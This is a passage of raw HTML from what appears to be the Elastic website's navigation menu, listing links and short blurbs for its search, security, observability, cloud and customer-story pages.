class="Card_dropdown-link__qZWTu" href="https://partners.elastic.co/findapartner/" tabindex="-1">Find a partner<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/partners/become-a-partner" tabindex="-1">Become a partner<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/partners" tabindex="-1"><span class="jsx-1596590093 btn-copy">Partner overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt0090c6239e64faf8/62aa0980c949fd5059e8aebc/logo-stack-32-color.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">ELK Stack</h2></div><div class="Card_card-body__81rqO"><div><p>Search and analytics, data ingestion, and visualization – all at your fingertips.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/kibana" tabindex="-1">Kibana<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/elasticsearch" tabindex="-1">Elasticsearch<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/integrations" tabindex="-1">Integrations<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/elastic-stack" tabindex="-1"><span class="jsx-1596590093 btn-copy">ELK Stack overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div><hr class="Card_nav-divider__yt_19"/><div><p><strong>By developers, for developers</strong></p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/elasticsearch/vector-database" tabindex="-1">Try the world&#x27;s most used vector database<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/blog/search-ai-lake-elastic-cloud-serverless" tabindex="-1">Scale with the low-latency Search AI Lake<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/community" tabindex="-1">Join our community<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div></div><div class="Items_Section__vJ9lm"><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltdb0f38c35ae455dc/5d07f086877575d0584760a3/logo-cloud-24-color.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div><h2 class="h5">Elastic Cloud</h2></div><div class="Card_card-body__81rqO"><div><p>Unlock the power of real-time insights with Elastic on your preferred cloud provider.</p></div><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/cloud" tabindex="-1"><span class="jsx-1596590093 btn-copy">Elastic Cloud overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div><hr class="Card_nav-divider__yt_19"/><ul><li><a class="Card_dropdown-link__qZWTu" href="/cloud/serverless" tabindex="-1">Elastic Cloud Serverless<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/pricing/serverless-search" tabindex="-1">Elastic Cloud Serverless pricing<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/cloud/serverless/search-ai-lake" tabindex="-1">Search AI Lake<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div></div></div></div></div></div></div><div><button class="Items_navigation-items_item__7YSef navigation-item" aria-label="Solutions, press down to open menu." aria-expanded="false">Solutions<svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z"></path></svg></button><div class="Dropdown_Dropdown__pUJPf "><div class="Dropdown_DropdownContent__tGePQ"><button class="Dropdown_DropdownClose__wx62b" disabled=""><span class="Dropdown_DropdownClose_text__IoOgP">Close panel</span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.58586 8.00008L0.292969 14.293L1.70718 15.7072L8.00008 9.41429L14.293 15.7072L15.7072 14.293L9.41429 8.00008L15.7072 1.70718L14.293 0.292969L8.00008 6.58586L1.70718 0.292969L0.292969 1.70718L6.58586 8.00008Z"></path></svg></button><div class="Dropdown_DropdownSections__G_B5O"><div class="Items_Section__vJ9lm Items_spotlight-feature___wj__"><div class=" Card_nav-card__Gb2bd Card_ghost-card__kC3tT "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/generative-ai"><h2 class="h5">Generative AI</h2></a><a class="Card_custom-link__semnr" href="/generative-ai"></a><a class="Card_custom-link__semnr" href="/generative-ai"></a><a class="Card_custom-link__semnr" href="/generative-ai"></a><a class="Card_custom-link__semnr" href="/generative-ai"></a></div><div class="Card_card-body__81rqO"><div><p>Prototype and integrate with LLMs faster using search AI.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/cloud/serverless/search-ai-lake" tabindex="-1">Search AI Lake<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/elasticsearch/ai-assistant" tabindex="-1">Elastic AI Assistant<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/rag" tabindex="-1">Retrieval Augmented Generation<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><hr class="Card_nav-divider__yt_19"/><ul><li><a class="Card_dropdown-link__qZWTu" href="/blog/category/generative-ai" tabindex="-1">Generative AI blogs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/search-labs/tutorials" tabindex="-1">Search Labs tutorials<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/community" tabindex="-1">Elastic Community<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/generative-ai" tabindex="-1"><span class="jsx-1596590093 btn-copy">Generative AI overview </span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div><div class="Items_Section__vJ9lm Items_grid-column__BSkh1"><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/enterprise-search"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt549f7d977c2a88f4/5d082d34616162aa5a85707d/logo-enterprise-search-32-color.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div></a><a class="Card_custom-link__semnr" href="/enterprise-search"><h2 class="h5">Search</h2></a><a class="Card_custom-link__semnr" href="/enterprise-search"></a><a class="Card_custom-link__semnr" href="/enterprise-search"></a><a class="Card_custom-link__semnr" href="/enterprise-search"></a><a class="Card_custom-link__semnr" href="/enterprise-search"></a></div><div class="Card_card-body__81rqO"><div><p>Discover a world of AI possibilities — built with the power of search.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/elasticsearch/vector-database" tabindex="-1">Vector database<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/relevance" tabindex="-1">Relevance<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/search-applications" tabindex="-1">Search applications<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/ecommerce" tabindex="-1">Ecommerce<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/site-search" tabindex="-1">Website search<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/workplace-search" tabindex="-1">Workplace search<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/enterprise-search/customer-support" tabindex="-1">Customer support<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><hr class="Card_nav-divider__yt_19"/><ul><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/search-labs" tabindex="-1">Search Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/enterprise-search" tabindex="-1"><span class="jsx-1596590093 btn-copy">Search overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/security"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltf58b7c8e04706979/5e20f1a8132ead1155e8d0a4/logo-security-32-color.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div></a><a class="Card_custom-link__semnr" href="/security"><h2 class="h5">Security</h2></a><a class="Card_custom-link__semnr" href="/security"></a><a class="Card_custom-link__semnr" href="/security"></a><a class="Card_custom-link__semnr" href="/security"></a><a class="Card_custom-link__semnr" href="/security"></a></div><div class="Card_card-body__81rqO"><div><p>Protect, investigate, and respond to cyber threats with AI-driven security analytics.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/security/siem" tabindex="-1">SIEM<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/security/ai" tabindex="-1">AI for the SOC<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/security/cyber-threat-research" tabindex="-1">Threat Research<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><hr class="Card_nav-divider__yt_19"/><ul><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/security-labs" tabindex="-1">Security Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/security" tabindex="-1"><span class="jsx-1596590093 btn-copy">Security overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/observability"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltbf6ba0d0e0e1e5ab/5e20f19a2aa8e40a75136318/logo-observability-32-color.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div></a><a class="Card_custom-link__semnr" href="/observability"><h2 class="h5">Observability</h2></a><a class="Card_custom-link__semnr" href="/observability"></a><a class="Card_custom-link__semnr" href="/observability"></a><a class="Card_custom-link__semnr" href="/observability"></a><a class="Card_custom-link__semnr" href="/observability"></a></div><div class="Card_card-body__81rqO"><div><p>Unify app and infrastructure visibility to proactively resolve issues.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/observability/log-monitoring" tabindex="-1">Log monitoring and analytics<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/opentelemetry" tabindex="-1">OpenTelemetry<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/application-performance-monitoring" tabindex="-1">Application performance monitoring<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/infrastructure-monitoring" tabindex="-1">Infrastructure monitoring<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/synthetic-monitoring" tabindex="-1">Synthetic monitoring<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/real-user-monitoring" tabindex="-1">Real user monitoring<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/universal-profiling" tabindex="-1">Universal Profiling<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/observability/aiops" tabindex="-1">AIOps<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul><hr class="Card_nav-divider__yt_19"/><ul><li><a class="Card_dropdown-link__qZWTu" href="https://www.elastic.co/observability-labs" tabindex="-1">Observability Labs<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/observability" tabindex="-1"><span class="jsx-1596590093 btn-copy">Observability overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div></div></div></div></div><div><button class="Items_navigation-items_item__7YSef navigation-item" aria-label="Customers, press down to open menu." aria-expanded="false">Customers<svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z"></path></svg></button><div class="Dropdown_Dropdown__pUJPf "><div class="Dropdown_DropdownContent__tGePQ"><button class="Dropdown_DropdownClose__wx62b" disabled=""><span class="Dropdown_DropdownClose_text__IoOgP">Close panel</span><svg class="icons_icon__n3nWe" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.58586 8.00008L0.292969 14.293L1.70718 15.7072L8.00008 9.41429L14.293 15.7072L15.7072 14.293L9.41429 8.00008L15.7072 1.70718L14.293 0.292969L8.00008 6.58586L1.70718 0.292969L0.292969 1.70718L6.58586 8.00008Z"></path></svg></button><div class="Dropdown_DropdownSections__G_B5O"><div class="Items_Section__vJ9lm"><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/customers"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/bltacc5e178e52f430e/647ccc7b6be35fb5eabd2100/icon-checkmark-decorative-border.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div></a><a class="Card_custom-link__semnr" href="/customers"><h2 class="h5">By solution</h2></a><a class="Card_custom-link__semnr" href="/customers"></a><a class="Card_custom-link__semnr" href="/customers"></a></div><div class="Card_card-body__81rqO"><div><p>See how customers search, solve, and succeed — all on one Search AI Platform.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/customers/success-stories?usecase=enterprise-search&amp;industry=All" tabindex="-1">Search<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/customers/success-stories?usecase=security-analytics&amp;industry=All" tabindex="-1">Security<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/customers/success-stories?usecase=elastic-observability&amp;industry=All" tabindex="-1">Observability<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/customers" tabindex="-1"><span class="jsx-1596590093 btn-copy">All customer stories</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div><div class=" Card_nav-card__Gb2bd Card_icon-card__IEL2U "><div class="Card_card-header__dLhyK"><a class="Card_custom-link__semnr" href="/industries"><div class="Card_card-image__34JYo"><div class=" Card_icon__VSCRq "><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt9f634b6f74878698/647ccc625637890f19859454/icon-briefcase.svg" class="Card_img-fluid__EqrlH" alt=""/></div></div></a><a class="Card_custom-link__semnr" href="/industries"><h2 class="h5">Industries</h2></a><a class="Card_custom-link__semnr" href="/industries"></a><a class="Card_custom-link__semnr" href="/industries"></a></div><div class="Card_card-body__81rqO"><div><p>Exceed customer expectations and go to market faster.</p></div><ul><li><a class="Card_dropdown-link__qZWTu" href="/industries/public-sector" tabindex="-1">Public sector<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/industries/financial-services" tabindex="-1">Financial services<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/industries/telecommunications" tabindex="-1">Telecommunications<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/industries/retail-ecommerce" tabindex="-1">Retail<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li><li><a class="Card_dropdown-link__qZWTu" href="/industries/manufacturing" tabindex="-1">Manufacturing<svg width="27" height="14" viewBox="0 0 27 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0 7H25" stroke="#0B64DD" stroke-width="2"></path><path d="M19 1L25 7L19 13" stroke="#0B64DD" stroke-width="2"></path></svg></a></li></ul></div><div class="Card_card-footer__OfpS8"><div class="d-flex flex-column"><a class="button Card_dropdown-link__qZWTu Card_dropdown-link__spaced___Q1m0 Card_btn-tertiary__f8UEk btn-tertiary" href="/industries" tabindex="-1"><span class="jsx-1596590093 btn-copy">Industries overview</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div></div></div><div class="Items_Section__vJ9lm Items_spotlight-feature___wj__"><div class=" Card_nav-card__Gb2bd undefined "><div class="Card_card-header__dLhyK"><h2 class="Card_topic-heading___KyPp">Customer spotlight</h2></div><div><div class="Spotlight_spotlight-card__Qi_WV"><div class="Spotlight_card-image__4S6cS"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt652fec920f2b1a14/650c1d87aa86c13fa1cc288c/logo-nav-dropdown-48x48-cisco.svg" alt="" class=""/></div><div class="Spotlight_card-body___rb9E"><p>Cisco saves 5,000 support engineer hours per month</p><a class="button Spotlight_stretched-link__2M98R btn-tertiary" href="/customers/cisco" tabindex="-1"><span class="jsx-1596590093 btn-copy">Read more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div><div class="Spotlight_spotlight-card__Qi_WV"><div class="Spotlight_card-image__4S6cS"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blte788c0f923f209a3/668c49f5534bb913eb26e9e8/logo-dropdown-48x48-sitecore.svg" alt="" class=""/></div><div class="Spotlight_card-body___rb9E"><p>Sitecore automates 96 percent of security workflows with Elastic</p><a class="button Spotlight_stretched-link__2M98R btn-tertiary" href="/customers/sitecore-security" tabindex="-1"><span class="jsx-1596590093 btn-copy">Read more</span><svg class="icon-embed" width="27" height="15"><use href="/static-res/images/generic-icons.svg#cta-arrow"></use></svg></a></div></div><div class="Spotlight_spotlight-card__Qi_WV"><div class="Spotlight_card-image__4S6cS"><img src="https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt90a52ed02808cbc1/650c1dadb25642d90add1e4e/logo-nav-dropdown-48x48-comcast.svg" alt="" 